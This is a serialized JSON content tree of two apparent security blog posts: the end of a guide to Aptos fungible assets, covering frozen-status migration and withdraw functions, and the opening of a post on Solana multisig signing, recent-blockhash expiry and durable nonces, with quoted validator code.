maybe_convert_to_fungible_store",{"type":25,"tag":216,"props":71402,"children":71403},{"style":6964},[71404],{"type":31,"value":9757},{"type":25,"tag":216,"props":71406,"children":71407},{"style":7375},[71408],{"type":31,"value":10535},{"type":25,"tag":216,"props":71410,"children":71411},{"style":6964},[71412],{"type":31,"value":71413},">(signer",{"type":25,"tag":216,"props":71415,"children":71416},{"style":6953},[71417],{"type":31,"value":7438},{"type":25,"tag":216,"props":71419,"children":71420},{"style":7047},[71421],{"type":31,"value":11161},{"type":25,"tag":216,"props":71423,"children":71424},{"style":6964},[71425],{"type":31,"value":1850},{"type":25,"tag":216,"props":71427,"children":71428},{"style":6947},[71429],{"type":31,"value":16909},{"type":25,"tag":216,"props":71431,"children":71432},{"style":6964},[71433],{"type":31,"value":11175},{"type":25,"tag":216,"props":71435,"children":71436},{"class":6922,"line":7216},[71437],{"type":25,"tag":216,"props":71438,"children":71439},{"style":6964},[71440],{"type":31,"value":7874},{"type":25,"tag":38,"props":71442,"children":71443},{},[71444,71446,71451,71453,71458],{"type":31,"value":71445},"A curious reader might wonder about the fate of the ",{"type":25,"tag":82,"props":71447,"children":71449},{"className":71448},[],[71450],{"type":31,"value":65096},{"type":31,"value":71452}," \"frozen\" status during migration. Unsurprisingly tough, the \"frozen\" status of the primary fungible store is matched to that of the ",{"type":25,"tag":82,"props":71454,"children":71456},{"className":71455},[],[71457],{"type":31,"value":65096},{"type":31,"value":71459}," to ensure consistency.",{"type":25,"tag":70154,"props":71461,"children":71462},{},[71463,71482],{"type":25,"tag":38,"props":71464,"children":71465},{},[71466,71468,71473,71475,71480],{"type":31,"value":71467},"Could an attacker convert their ",{"type":25,"tag":82,"props":71469,"children":71471},{"className":71470},[],[71472],{"type":31,"value":65096},{"type":31,"value":71474}," to a primary fungible store and then register another ",{"type":25,"tag":82,"props":71476,"children":71478},{"className":71477},[],[71479],{"type":31,"value":65096},{"type":31,"value":71481}," only to convert it again to manipulate the \"frozen\" status of the linked primary fungible store?",{"type":25,"tag":70185,"props":71483,"children":71484},{"v-slot:answer-0":7},[71485],{"type":25,"tag":38,"props":71486,"children":71487},{},[71488],{"type":31,"value":71489},"The coin::register function first checks is_account_registered, which exits early if true. is_account_registered determines if the account has a primary fungible store for the linked fungible asset when the CoinStore doesn’t exist. If the fungible store has been converted, a primary fungible store and linked fungible asset will already exist, preventing re-registration.",{"type":25,"tag":26,"props":71491,"children":71492},{"id":32892},[71493],{"type":31,"value":22907},{"type":25,"tag":38,"props":71495,"children":71496},{},[71497,71499,71504],{"type":31,"value":71498},"Aptos's implementation of fungible assets does indeed resolve the original problems with ",{"type":25,"tag":82,"props":71500,"children":71502},{"className":71501},[],[71503],{"type":31,"value":64934},{"type":31,"value":179},{"type":25,"tag":38,"props":71506,"children":71507},{},[71508],{"type":31,"value":71509},"However, this solution comes with its own challenges, in part because of the numerous layers that interact with each other. Before using the fungible asset standard, it's important to understand these different APIs and potential pitfalls.",{"type":25,"tag":38,"props":71511,"children":71512},{},[71513,71515],{"type":31,"value":71514},"As a final exercise to the reader, how many different ways are there to withdraw a fungible asset?",{"type":25,"tag":19431,"props":71516,"children":71517},{},[71518],{"type":25,"tag":162,"props":71519,"children":71521},{"href":33584,"ariaDescribedBy":71520,"dataFootnoteRef":7,"id":33586},[19438],[71522],{"type":31,"value":184},{"type":25,"tag":22381,"props":71524,"children":71526},{"className":71525,"dataFootnotes":7},[22384],[71527,71532],{"type":25,"tag":26,"props":71528,"children":71530},{"className":71529,"id":19438},[22389],[71531],{"type":31,"value":22392},{"type":25,"tag":6711,"props":71533,"children":71534},{},[71535],{"type":25,"tag":2043,"props":71536,"children":71537},{"id":34327},[71538,71540,71582],{"type":31,"value":71539},"There are at least four functions that can withdraw a fungible asset:",{"type":25,"tag":2039,"props":71541,"children":71542},{},[71543,71553,71562,71572],{"type":25,"tag":2043,"props":71544,"children":71545},{},[71546],{"type":25,"tag":162,"props":71547,"children":71551},{"href":71548,"rel":71549,":style":71550},"https://github.com/aptos-labs/aptos-core/blob/81a2f4268b9e0f25cb6e1ce5c28bba0a34c27604/aptos-move/framework/aptos-framework/sources/fungible_asset.move#L782",[166],"color: #007bff;",[71552],{"type":31,"value":68235},{"type":25,"tag":2043,"props":71554,"children":71555},{},[71556],{"type":25,"tag":162,"props":71557,"children":71560},{"href":71558,"rel":71559,":style":71550},"https://github.com/aptos-labs/aptos-core/blob/main/aptos-move/framework/aptos-framework/sources/dispatchable_fungible_asset.move#L74",[166],[71561],{"type":31,"value":70175},{"type":25,"tag":2043,"props":71563,"children":71564},{},[71565],{"type":25,"tag":162,"props":71566,"children":71569},{"href":71567,"rel":71568,":style":71550},"https://github.com/aptos-labs/aptos-core/blob/81a2f4268b9e0f25cb6e1ce5c28bba0a34c27604/aptos-move/framework/aptos-framework/sources/primary_fungible_store.move#L157",[166],[71570],{"type":31,"value":71571},"primary_fungible_store::withdraw",{"type":25,"tag":2043,"props":71573,"children":71574},{},[71575],{"type":25,"tag":162,"props":71576,"children":71579},{"href":71577,"rel":71578,":style":71550},"https://github.com/aptos-labs/aptos-core/blob/main/aptos-move/framework/aptos-framework/sources/coin.move#L1091-L1098",[166],[71580],{"type":31,"value":71581},"coin::withdraw",{"type":25,"tag":162,"props":71583,"children":71585},{"href":34355,"ariaLabel":22495,"className":71584,"dataFootnoteBackref":7},[22497],[71586],{"type":31,"value":22500},{"type":25,"tag":9316,"props":71588,"children":71589},{},[71590],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":71592},[71593,71594,71595,71598,71603,71604,71605,71606],{"id":64920,"depth":6769,"text":64923},{"id":65465,"depth":6769,"text":65468},{"id":66025,"depth":6769,"text":66028,"children":71596},[71597],{"id":66536,"depth":6778,"text":66539},{"id":66793,"depth":6769,"text":66796,"children":71599},[71600,71601,71602],{"id":66836,"depth":6778,"text":66839},{"id":67541,"depth":6778,"text":67544},{"id":69199,"depth":6778,"text":69202},{"id":69730,"depth":6769,"text":69733},{"id":70711,"depth":6769,"text":70714},{"id":32892,"depth":6769,"text":22907},{"id":19438,"depth":6769,"text":22392},"content:blog:2025-02-10-hitchhikers-guide-to-aptos-fungible-assets.md","blog/2025-02-10-hitchhikers-guide-to-aptos-fungible-assets.md","blog/2025-02-10-hitchhikers-guide-to-aptos-fungible-assets",{"_path":71611,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":71612,"description":71613,"date":71614,"author":9670,"image":71615,"isFeatured":16,"onBlogPage":16,"tags":71617,"body":71618,"_type":6798,"_id":73446,"_source":6800,"_file":73447,"_stem":73448,"_extension":6803},"/blog/2025-02-22-multisig-security","Solana Multisig Security","What can teams do if their multisig signers are compromised? We explore Solana's transaction signing model and present a procedure for safe signing in the presence of malicious signers on Solana.","2025-02-22",{"src":71616,"width":9336,"height":9337},"/posts/multisig-security/title.png",[6815],{"type":22,"children":71619,"toc":73437},[71620,71633,71639,71644,71650,71663,71671,71684,71744,71766,71893,71898,71911,71923,71929,71943,71956,71970,72452,72457,72465,72479,72493,72632,72644,72650,72655,72673,72678,72683,72704,72988,73003,73191,73204,73333,73338,73343,73348,73376,73382,73387,73401,73433],{"type":25,"tag":38,"props":71621,"children":71622},{},[71623,71624,71631],{"type":31,"value":474},{"type":25,"tag":162,"props":71625,"children":71628},{"href":71626,"rel":71627},"https://www.securityalliance.org/news/2025-02-dprk-advisory",[166],[71629],{"type":31,"value":71630},"Bybit hack",{"type":31,"value":71632}," raises an interesting question: what can teams do if their signers are compromised?",{"type":25,"tag":26,"props":71634,"children":71636},{"id":71635},"solana-signatures",[71637],{"type":31,"value":71638},"Solana Signatures",{"type":25,"tag":38,"props":71640,"children":71641},{},[71642],{"type":31,"value":71643},"We first need to understand how Solana signatures work. There are two ways to sign a Solana transaction.",{"type":25,"tag":606,"props":71645,"children":71647},{"id":71646},"recent-blockhash",[71648],{"type":31,"value":71649},"Recent Blockhash",{"type":25,"tag":38,"props":71651,"children":71652},{},[71653,71655,71662],{"type":31,"value":71654},"The most straightforward is with a \"recent blockhash\". From ",{"type":25,"tag":162,"props":71656,"children":71659},{"href":71657,"rel":71658},"https://solana.com/developers/guides/advanced/confirmation",[166],[71660],{"type":31,"value":71661},"the docs",{"type":31,"value":1472},{"type":25,"tag":34,"props":71664,"children":71665},{},[71666],{"type":25,"tag":38,"props":71667,"children":71668},{},[71669],{"type":31,"value":71670},"During transaction processing, Solana Validators will check if each transaction's recent blockhash is recorded within the most recent 151 stored hashes (aka \"max processing age\"). If the transaction's recent blockhash is older than this max processing age, the transaction is not processed.",{"type":25,"tag":38,"props":71672,"children":71673},{},[71674,71676,71683],{"type":31,"value":71675},"The actual constant ",{"type":25,"tag":162,"props":71677,"children":71680},{"href":71678,"rel":71679},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/sdk/clock/src/lib.rs#L129-L130",[166],[71681],{"type":31,"value":71682},"is defined here",{"type":31,"value":179},{"type":25,"tag":206,"props":71685,"children":71687},{"className":6915,"code":71686,"language":6914,"meta":7,"style":7},"// The maximum age of a blockhash that will be accepted by the leader\npub const MAX_PROCESSING_AGE: usize = MAX_RECENT_BLOCKHASHES / 2;\n",[71688],{"type":25,"tag":82,"props":71689,"children":71690},{"__ignoreMap":7},[71691,71699],{"type":25,"tag":216,"props":71692,"children":71693},{"class":6922,"line":6923},[71694],{"type":25,"tag":216,"props":71695,"children":71696},{"style":6927},[71697],{"type":31,"value":71698},"// The maximum age of a blockhash that will be accepted by the leader\n",{"type":25,"tag":216,"props":71700,"children":71701},{"class":6922,"line":6769},[71702,71706,71710,71715,71719,71723,71727,71732,71736,71740],{"type":25,"tag":216,"props":71703,"children":71704},{"style":6936},[71705],{"type":31,"value":17647},{"type":25,"tag":216,"props":71707,"children":71708},{"style":6936},[71709],{"type":31,"value":43074},{"type":25,"tag":216,"props":71711,"children":71712},{"style":6964},[71713],{"type":31,"value":71714}," MAX_PROCESSING_AGE",{"type":25,"tag":216,"props":71716,"children":71717},{"style":6953},[71718],{"type":31,"value":1472},{"type":25,"tag":216,"props":71720,"children":71721},{"style":7375},[71722],{"type":31,"value":17688},{"type":25,"tag":216,"props":71724,"children":71725},{"style":6953},[71726],{"type":31,"value":6956},{"type":25,"tag":216,"props":71728,"children":71729},{"style":6964},[71730],{"type":31,"value":71731}," MAX_RECENT_BLOCKHASHES ",{"type":25,"tag":216,"props":71733,"children":71734},{"style":6953},[71735],{"type":31,"value":5755},{"type":25,"tag":216,"props":71737,"children":71738},{"style":6989},[71739],{"type":31,"value":11886},{"type":25,"tag":216,"props":71741,"children":71742},{"style":6964},[71743],{"type":31,"value":6967},{"type":25,"tag":38,"props":71745,"children":71746},{},[71747,71749,71756,71758,71764],{"type":31,"value":71748},"For those curious, the logic ",{"type":25,"tag":162,"props":71750,"children":71753},{"href":71751,"rel":71752},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/runtime/src/bank/check_transactions.rs#L61",[166],[71754],{"type":31,"value":71755},"starts here",{"type":31,"value":71757}," and is quite straightforward to follow, ending in a ",{"type":25,"tag":82,"props":71759,"children":71761},{"className":71760},[],[71762],{"type":31,"value":71763},"is_hash_index_valid",{"type":31,"value":71765}," check.",{"type":25,"tag":206,"props":71767,"children":71769},{"className":6915,"code":71768,"language":6914,"meta":7,"style":7},"fn is_hash_index_valid(last_hash_index: u64, max_age: usize, hash_index: u64) -> bool {\n    last_hash_index - hash_index \u003C= max_age as u64\n}\n",[71770],{"type":25,"tag":82,"props":71771,"children":71772},{"__ignoreMap":7},[71773,71852,71886],{"type":25,"tag":216,"props":71774,"children":71775},{"class":6922,"line":6923},[71776,71780,71785,71789,71794,71798,71802,71806,71811,71815,71819,71823,71828,71832,71836,71840,71844,71848],{"type":25,"tag":216,"props":71777,"children":71778},{"style":6936},[71779],{"type":31,"value":24226},{"type":25,"tag":216,"props":71781,"children":71782},{"style":7047},[71783],{"type":31,"value":71784}," is_hash_index_valid",{"type":25,"tag":216,"props":71786,"children":71787},{"style":6964},[71788],{"type":31,"value":1850},{"type":25,"tag":216,"props":71790,"children":71791},{"style":6947},[71792],{"type":31,"value":71793},"last_hash_index",{"type":25,"tag":216,"props":71795,"children":71796},{"style":6953},[71797],{"type":31,"value":1472},{"type":25,"tag":216,"props":71799,"children":71800},{"style":7375},[71801],{"type":31,"value":9811},{"type":25,"tag":216,"props":71803,"children":71804},{"style":6964},[71805],{"type":31,"value":7026},{"type":25,"tag":216,"props":71807,"children":71808},{"style":6947},[71809],{"type":31,"value":71810},"max_age",{"type":25,"tag":216,"props":71812,"children":71813},{"style":6953},[71814],{"type":31,"value":1472},{"type":25,"tag":216,"props":71816,"children":71817},{"style":7375},[71818],{"type":31,"value":17688},{"type":25,"tag":216,"props":71820,"children":71821},{"style":6964},[71822],{"type":31,"value":7026},{"type":25,"tag":216,"props":71824,"children":71825},{"style":6947},[71826],{"type":31,"value":71827},"hash_index",{"type":25,"tag":216,"props":71829,"children":71830},{"style":6953},[71831],{"type":31,"value":1472},{"type":25,"tag":216,"props":71833,"children":71834},{"style":7375},[71835],{"type":31,"value":9811},{"type":25,"tag":216,"props":71837,"children":71838},{"style":6964},[71839],{"type":31,"value":7036},{"type":25,"tag":216,"props":71841,"children":71842},{"style":6953},[71843],{"type":31,"value":17714},{"type":25,"tag":216,"props":71845,"children":71846},{"style":7375},[71847],{"type":31,"value":16006},{"type":25,"tag":216,"props":71849,"children":71850},{"style":6964},[71851],{"type":31,"value":7241},{"type":25,"tag":216,"props":71853,"children":71854},{"class":6922,"line":6769},[71855,71860,71864,71869,71873,71878,71882],{"type":25,"tag":216,"props":71856,"children":71857},{"style":6947},[71858],{"type":31,"value":71859},"    last_hash_index",{"type":25,"tag":216,"props":71861,"children":71862},{"style":6953},[71863],{"type":31,"value":55224},{"type":25,"tag":216,"props":71865,"children":71866},{"style":6947},[71867],{"type":31,"value":71868}," hash_index",{"type":25,"tag":216,"props":71870,"children":71871},{"style":6953},[71872],{"type":31,"value":12149},{"type":25,"tag":216,"props":71874,"children":71875},{"style":6947},[71876],{"type":31,"value":71877}," max_age",{"type":25,"tag":216,"props":71879,"children":71880},{"style":6936},[71881],{"type":31,"value":12781},{"type":25,"tag":216,"props":71883,"children":71884},{"style":7375},[71885],{"type":31,"value":17153},{"type":25,"tag":216,"props":71887,"children":71888},{"class":6922,"line":6778},[71889],{"type":25,"tag":216,"props":71890,"children":71891},{"style":6964},[71892],{"type":31,"value":7874},{"type":25,"tag":38,"props":71894,"children":71895},{},[71896],{"type":31,"value":71897},"One important consequence is that any signed transaction has a natural expiration of around a few minutes.",{"type":25,"tag":34,"props":71899,"children":71900},{},[71901],{"type":25,"tag":38,"props":71902,"children":71903},{},[71904,71906],{"type":31,"value":71905},"Since slots (aka the time period a validator can produce a block) are configured to last about 400ms, but may fluctuate between 400ms and 600ms, ",{"type":25,"tag":9273,"props":71907,"children":71908},{},[71909],{"type":31,"value":71910},"a given blockhash can only be used by transactions for about 60 to 90 seconds before it will be considered expired by the runtime.",{"type":25,"tag":38,"props":71912,"children":71913},{},[71914,71916,71921],{"type":31,"value":71915},"This means an attacker ",{"type":25,"tag":64,"props":71917,"children":71918},{},[71919],{"type":31,"value":71920},"must use",{"type":31,"value":71922}," a malicious signed transaction within a short timeframe.",{"type":25,"tag":606,"props":71924,"children":71926},{"id":71925},"durable-nonce",[71927],{"type":31,"value":71928},"Durable Nonce",{"type":25,"tag":38,"props":71930,"children":71931},{},[71932,71934,71941],{"type":31,"value":71933},"The second type of signature ",{"type":25,"tag":162,"props":71935,"children":71938},{"href":71936,"rel":71937},"https://solana.com/developers/guides/advanced/introduction-to-durable-nonces",[166],[71939],{"type":31,"value":71940},"is a durable nonce",{"type":31,"value":71942},". These were created to solve the very feature (or problem) mentioned above: short expiration time.",{"type":25,"tag":34,"props":71944,"children":71945},{},[71946],{"type":25,"tag":38,"props":71947,"children":71948},{},[71949,71951],{"type":31,"value":71950},"durable nonces provide an opportunity to create and sign a transaction that can be submitted at any point in the future, and much more. ",{"type":25,"tag":9273,"props":71952,"children":71953},{},[71954],{"type":31,"value":71955},"This opens up a wide range of use cases that are otherwise not possible or too difficult to implement",{"type":25,"tag":38,"props":71957,"children":71958},{},[71959,71961,71968],{"type":31,"value":71960},"If we examine the code ",{"type":25,"tag":162,"props":71962,"children":71965},{"href":71963,"rel":71964},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/runtime/src/bank/check_transactions.rs#L104",[166],[71966],{"type":31,"value":71967},"for recent blockhash validation",{"type":31,"value":71969},", we can also see the handling for durable nonces.",{"type":25,"tag":206,"props":71971,"children":71973},{"className":6915,"code":71972,"language":6914,"meta":7,"style":7},"    let recent_blockhash = tx.message().recent_blockhash();\n    if let Some(hash_info) = hash_queue.get_hash_info_if_valid(recent_blockhash, max_age) {\n        Ok(CheckedTransactionDetails {\n            nonce: None,\n            lamports_per_signature: hash_info.lamports_per_signature(),\n        })\n    } else if let Some((nonce, previous_lamports_per_signature)) = self\n        .check_load_and_advance_message_nonce_account(\n            tx.message(),\n            next_durable_nonce,\n            next_lamports_per_signature,\n        )\n    {\n        Ok(CheckedTransactionDetails {\n            nonce: Some(nonce),\n            lamports_per_signature: previous_lamports_per_signature,\n        })\n    } else {\n        error_counters.blockhash_not_found += 1;\n        Err(TransactionError::BlockhashNotFound)\n    }\n",[71974],{"type":25,"tag":82,"props":71975,"children":71976},{"__ignoreMap":7},[71977,72024,72090,72110,72130,72160,72168,72222,72239,72259,72271,72283,72291,72298,72317,72344,72364,72371,72386,72416,72445],{"type":25,"tag":216,"props":71978,"children":71979},{"class":6922,"line":6923},[71980,71984,71989,71993,71998,72002,72007,72011,72015,72020],{"type":25,"tag":216,"props":71981,"children":71982},{"style":6936},[71983],{"type":31,"value":6939},{"type":25,"tag":216,"props":71985,"children":71986},{"style":6947},[71987],{"type":31,"value":71988}," recent_blockhash",{"type":25,"tag":216,"props":71990,"children":71991},{"style":6953},[71992],{"type":31,"value":6956},{"type":25,"tag":216,"props":71994,"children":71995},{"style":6947},[71996],{"type":31,"value":71997}," tx",{"type":25,"tag":216,"props":71999,"children":72000},{"style":6953},[72001],{"type":31,"value":179},{"type":25,"tag":216,"props":72003,"children":72004},{"style":7047},[72005],{"type":31,"value":72006},"message",{"type":25,"tag":216,"props":72008,"children":72009},{"style":6964},[72010],{"type":31,"value":17836},{"type":25,"tag":216,"props":72012,"children":72013},{"style":6953},[72014],{"type":31,"value":179},{"type":25,"tag":216,"props":72016,"children":72017},{"style":7047},[72018],{"type":31,"value":72019},"recent_blockhash",{"type":25,"tag":216,"props":72021,"children":72022},{"style":6964},[72023],{"type":31,"value":7633},{"type":25,"tag":216,"props":72025,"children":72026},{"class":6922,"line":6769},[72027,72031,72035,72039,72043,72048,72052,72056,72061,72065,72070,72074,72078,72082,72086],{"type":25,"tag":216,"props":72028,"children":72029},{"style":6973},[72030],{"type":31,"value":16235},{"type":25,"tag":216,"props":72032,"children":72033},{"style":6936},[72034],{"type":31,"value":31263},{"type":25,"tag":216,"props":72036,"children":72037},{"style":7375},[72038],{"type":31,"value":31268},{"type":25,"tag":216,"props":72040,"children":72041},{"style":6964},[72042],{"type":31,"value":1850},{"type":25,"tag":216,"props":72044,"children":72045},{"style":6947},[72046],{"type":31,"value":72047},"hash_info",{"type":25,"tag":216,"props":72049,"children":72050},{"style":6964},[72051],{"type":31,"value":7036},{"type":25,"tag":216,"props":72053,"children":72054},{"style":6953},[72055],{"type":31,"value":266},{"type":25,"tag":216,"props":72057,"children":72058},{"style":6947},[72059],{"type":31,"value":72060}," hash_queue",{"type":25,"tag":216,"props":72062,"children":72063},{"style":6953},[72064],{"type":31,"value":179},{"type":25,"tag":216,"props":72066,"children":72067},{"style":7047},[72068],{"type":31,"value":72069},"get_hash_info_if_valid",{"type":25,"tag":216,"props":72071,"children":72072},{"style":6964},[72073],{"type":31,"value":1850},{"type":25,"tag":216,"props":72075,"children":72076},{"style":6947},[72077],{"type":31,"value":72019},{"type":25,"tag":216,"props":72079,"children":72080},{"style":6964},[72081],{"type":31,"value":7026},{"type":25,"tag":216,"props":72083,"children":72084},{"style":6947},[72085],{"type":31,"value":71810},{"type":25,"tag":216,"props":72087,"children":72088},{"style":6964},[72089],{"type":31,"value":18761},{"type":25,"tag":216,"props":72091,"children":72092},{"class":6922,"line":6778},[72093,72097,72101,72106],{"type":25,"tag":216,"props":72094,"children":72095},{"style":7375},[72096],{"type":31,"value":18769},{"type":25,"tag":216,"props":72098,"children":72099},{"style":6964},[72100],{"type":31,"value":1850},{"type":25,"tag":216,"props":72102,"children":72103},{"style":7375},[72104],{"type":31,"value":72105},"CheckedTransactionDetails",{"type":25,"tag":216,"props":72107,"children":72108},{"style":6964},[72109],{"type":31,"value":7241},{"type":25,"tag":216,"props":72111,"children":72112},{"class":6922,"line":7005},[72113,72118,72122,72126],{"type":25,"tag":216,"props":72114,"children":72115},{"style":6947},[72116],{"type":31,"value":72117},"            nonce",{"type":25,"tag":216,"props":72119,"children":72120},{"style":6953},[72121],{"type":31,"value":1472},{"type":25,"tag":216,"props":72123,"children":72124},{"style":7375},[72125],{"type":31,"value":31716},{"type":25,"tag":216,"props":72127,"children":72128},{"style":6964},[72129],{"type":31,"value":7465},{"type":25,"tag":216,"props":72131,"children":72132},{"class":6922,"line":7110},[72133,72138,72142,72147,72151,72156],{"type":25,"tag":216,"props":72134,"children":72135},{"style":6947},[72136],{"type":31,"value":72137},"            lamports_per_signature",{"type":25,"tag":216,"props":72139,"children":72140},{"style":6953},[72141],{"type":31,"value":1472},{"type":25,"tag":216,"props":72143,"children":72144},{"style":6947},[72145],{"type":31,"value":72146}," hash_info",{"type":25,"tag":216,"props":72148,"children":72149},{"style":6953},[72150],{"type":31,"value":179},{"type":25,"tag":216,"props":72152,"children":72153},{"style":7047},[72154],{"type":31,"value":72155},"lamports_per_signature",{"type":25,"tag":216,"props":72157,"children":72158},{"style":6964},[72159],{"type":31,"value":7448},{"type":25,"tag":216,"props":72161,"children":72162},{"class":6922,"line":7216},[72163],{"type":25,"tag":216,"props":72164,"children":72165},{"style":6964},[72166],{"type":31,"value":72167},"        })\n",{"type":25,"tag":216,"props":72169,"children":72170},{"class":6922,"line":7244},[72171,72175,72179,72183,72187,72191,72195,72200,72204,72209,72213,72217],{"type":25,"tag":216,"props":72172,"children":72173},{"style":6964},[72174],{"type":31,"value":19737},{"type":25,"tag":216,"props":72176,"children":72177},{"style":6973},[72178],{"type":31,"value":7268},{"type":25,"tag":216,"props":72180,"children":72181},{"style":6973},[72182],{"type":31,"value":19746},{"type":25,"tag":216,"props":72184,"children":72185},{"style":6936},[72186],{"type":31,"value":31263},{"type":25,"tag":216,"props":72188,"children":72189},{"style":7375},[72190],{"type":31,"value":31268},{"type":25,"tag":216,"props":72192,"children":72193},{"style":6964},[72194],{"type":31,"value":35485},{"type":25,"tag":216,"props":72196,"children":72197},{"style":6947},[72198],{"type":31,"value":72199},"nonce",{"type":25,"tag":216,"props":72201,"children":72202},{"style":6964},[72203],{"type":31,"value":7026},{"type":25,"tag":216,"props":72205,"children":72206},{"style":6947},[72207],{"type":31,"value":72208},"previous_lamports_per_signature",{"type":25,"tag":216,"props":72210,"children":72211},{"style":6964},[72212],{"type":31,"value":12790},{"type":25,"tag":216,"props":72214,"children":72215},{"style":6953},[72216],{"type":31,"value":266},{"type":25,"tag":216,"props":72218,"children":72219},{"style":6936},[72220],{"type":31,"value":72221}," self\n",{"type":25,"tag":216,"props":72223,"children":72224},{"class":6922,"line":7257},[72225,72230,72235],{"type":25,"tag":216,"props":72226,"children":72227},{"style":6953},[72228],{"type":31,"value":72229},"        .",{"type":25,"tag":216,"props":72231,"children":72232},{"style":7047},[72233],{"type":31,"value":72234},"check_load_and_advance_message_nonce_account",{"type":25,"tag":216,"props":72236,"children":72237},{"style":6964},[72238],{"type":31,"value":7420},{"type":25,"tag":216,"props":72240,"children":72241},{"class":6922,"line":7275},[72242,72247,72251,72255],{"type":25,"tag":216,"props":72243,"children":72244},{"style":6947},[72245],{"type":31,"value":72246},"            tx",{"type":25,"tag":216,"props":72248,"children":72249},{"style":6953},[72250],{"type":31,"value":179},{"type":25,"tag":216,"props":72252,"children":72253},{"style":7047},[72254],{"type":31,"value":72006},{"type":25,"tag":216,"props":72256,"children":72257},{"style":6964},[72258],{"type":31,"value":7448},{"type":25,"tag":216,"props":72260,"children":72261},{"class":6922,"line":7296},[72262,72267],{"type":25,"tag":216,"props":72263,"children":72264},{"style":6947},[72265],{"type":31,"value":72266},"            next_durable_nonce",{"type":25,"tag":216,"props":72268,"children":72269},{"style":6964},[72270],{"type":31,"value":7465},{"type":25,"tag":216,"props":72272,"children":72273},{"class":6922,"line":7305},[72274,72279],{"type":25,"tag":216,"props":72275,"children":72276},{"style":6947},[72277],{"type":31,"value":72278},"            next_lamports_per_signature",{"type":25,"tag":216,"props":72280,"children":72281},{"style":6964},[72282],{"type":31,"value":7465},{"type":25,"tag":216,"props":72284,"children":72285},{"class":6922,"line":7557},[72286],{"type":25,"tag":216,"props":72287,"children":72288},{"style":6964},[72289],{"type":31,"value":72290},"        )\n",{"type":25,"tag":216,"props":72292,"children":72293},{"class":6922,"line":7574},[72294],{"type":25,"tag":216,"props":72295,"children":72296},{"style":6964},[72297],{"type":31,"value":33147},{"type":25,"tag":216,"props":72299,"children":72300},{"class":6922,"line":7591},[72301,72305,72309,72313],{"type":25,"tag":216,"props":72302,"children":72303},{"style":7375},[72304],{"type":31,"value":18769},{"type":25,"tag":216,"props":72306,"children":72307},{"style":6964},[72308],{"type":31,"value":1850},{"type":25,"tag":216,"props":72310,"children":72311},{"style":7375},[72312],{"type":31,"value":72105},{"type":25,"tag":216,"props":72314,"children":72315},{"style":6964},[72316],{"type":31,"value":7241},{"type":25,"tag":216,"props":72318,"children":72319},{"class":6922,"line":7604},[72320,72324,72328,72332,72336,72340],{"type":25,"tag":216,"props":72321,"children":72322},{"style":6947},[72323],{"type":31,"value":72117},{"type":25,"tag":216,"props":72325,"children":72326},{"style":6953},[72327],{"type":31,"value":1472},{"type":25,"tag":216,"props":72329,"children":72330},{"style":7375},[72331],{"type":31,"value":31268},{"type":25,"tag":216,"props":72333,"children":72334},{"style":6964},[72335],{"type":31,"value":1850},{"type":25,"tag":216,"props":72337,"children":72338},{"style":6947},[72339],{"type":31,"value":72199},{"type":25,"tag":216,"props":72341,"children":72342},{"style":6964},[72343],{"type":31,"value":10688},{"type":25,"tag":216,"props":72345,"children":72346},{"class":6922,"line":7613},[72347,72351,72355,72360],{"type":25,"tag":216,"props":72348,"children":72349},{"style":6947},[72350],{"type":31,"value":72137},{"type":25,"tag":216,"props":72352,"children":72353},{"style":6953},[72354],{"type":31,"value":1472},{"type":25,"tag":216,"props":72356,"children":72357},{"style":6947},[72358],{"type":31,"value":72359}," previous_lamports_per_signature",{"type":25,"tag":216,"props":72361,"children":72362},{"style":6964},[72363],{"type":31,"value":7465},{"type":25,"tag":216,"props":72365,"children":72366},{"class":6922,"line":7636},[72367],{"type":25,"tag":216,"props":72368,"children":72369},{"style":6964},[72370],{"type":31,"value":72167},{"type":25,"tag":216,"props":72372,"children":72373},{"class":6922,"line":7645},[72374,72378,72382],{"type":25,"tag":216,"props":72375,"children":72376},{"style":6964},[72377],{"type":31,"value":19737},{"type":25,"tag":216,"props":72379,"children":72380},{"style":6973},[72381],{"type":31,"value":7268},{"type":25,"tag":216,"props":72383,"children":72384},{"style":6964},[72385],{"type":31,"value":7241},{"type":25,"tag":216,"props":72387,"children":72388},{"class":6922,"line":7654},[72389,72394,72398,72403,72408,72412],{"type":25,"tag":216,"props":72390,"children":72391},{"style":6947},[72392],{"type":31,"value":72393},"        error_counters",{"type":25,"tag":216,"props":72395,"children":72396},{"style":6953},[72397],{"type":31,"value":179},{"type":25,"tag":216,"props":72399,"children":72400},{"style":6964},[72401],{"type":31,"value":72402},"blockhash_not_found ",{"type":25,"tag":216,"props":72404,"children":72405},{"style":6953},[72406],{"type":31,"value":72407},"+=",{"type":25,"tag":216,"props":72409,"children":72410},{"style":6989},[72411],{"type":31,"value":8471},{"type":25,"tag":216,"props":72413,"children":72414},{"style":6964},[72415],{"type":31,"value":6967},{"type":25,"tag":216,"props":72417,"children":72418},{"class":6922,"line":7722},[72419,72423,72427,72432,72436,72441],{"type":25,"tag":216,"props":72420,"children":72421},{"style":7375},[72422],{"type":31,"value":18812},{"type":25,"tag":216,"props":72424,"children":72425},{"style":6964},[72426],{"type":31,"value":1850},{"type":25,"tag":216,"props":72428,"children":72429},{"style":7375},[72430],{"type":31,"value":72431},"TransactionError",{"type":25,"tag":216,"props":72433,"children":72434},{"style":6953},[72435],{"type":31,"value":7438},{"type":25,"tag":216,"props":72437,"children":72438},{"style":7375},[72439],{"type":31,"value":72440},"BlockhashNotFound",{"type":25,"tag":216,"props":72442,"children":72443},{"style":6964},[72444],{"type":31,"value":7107},{"type":25,"tag":216,"props":72446,"children":72447},{"class":6922,"line":7730},[72448],{"type":25,"tag":216,"props":72449,"children":72450},{"style":6964},[72451],{"type":31,"value":7311},{"type":25,"tag":38,"props":72453,"children":72454},{},[72455],{"type":31,"value":72456},"The documentation does a good job of explaining how they work.",{"type":25,"tag":34,"props":72458,"children":72459},{},[72460],{"type":25,"tag":38,"props":72461,"children":72462},{},[72463],{"type":31,"value":72464},"Durable Transaction Nonces, which are 32-byte in length (usually represented as base58 encoded strings), are used in place of recent blockhashes to make every transaction unique (to avoid double-spending) while removing the mortality on the unexecuted transaction.",{"type":25,"tag":38,"props":72466,"children":72467},{},[72468,72470,72477],{"type":31,"value":72469},"Durable nonces are created and 